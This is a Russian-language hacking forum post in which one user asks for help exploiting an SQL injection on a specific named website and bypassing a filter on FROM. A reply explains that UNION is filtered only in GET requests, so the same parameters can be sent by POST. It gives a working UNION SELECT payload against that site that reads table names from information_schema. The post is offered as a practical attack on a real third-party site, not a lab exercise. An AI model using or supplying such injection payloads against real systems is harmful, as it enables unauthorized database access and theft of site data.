28.12.2012, 20:29
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от zenon3
Помогите раскрутить
http://tonnel.ru/?l=recept&recept=obich&idi=193'
И еще такой вопрос. Как обойти фильтрацию FROM ? стандарто не получается
по первому вопросу:
запрос фильтруется по union, когда передаёшь гетом(возможно ещё что-то, но пофиг). Скрипт принимает пост так же как и гет, только не фильтрует данные (или же хост сам фильтрует только гет на юнионы и пр.).
Шлёшь на http://tonnel.ru/
l=recept&recept=obich&idi=-193' union select 1,(select table_name from information_schema.tables limit 1),3,4,5,6,7,8,9--
2. смотря как фильтруется, может и саму фильтрацию просто можно обойти.
|
|
|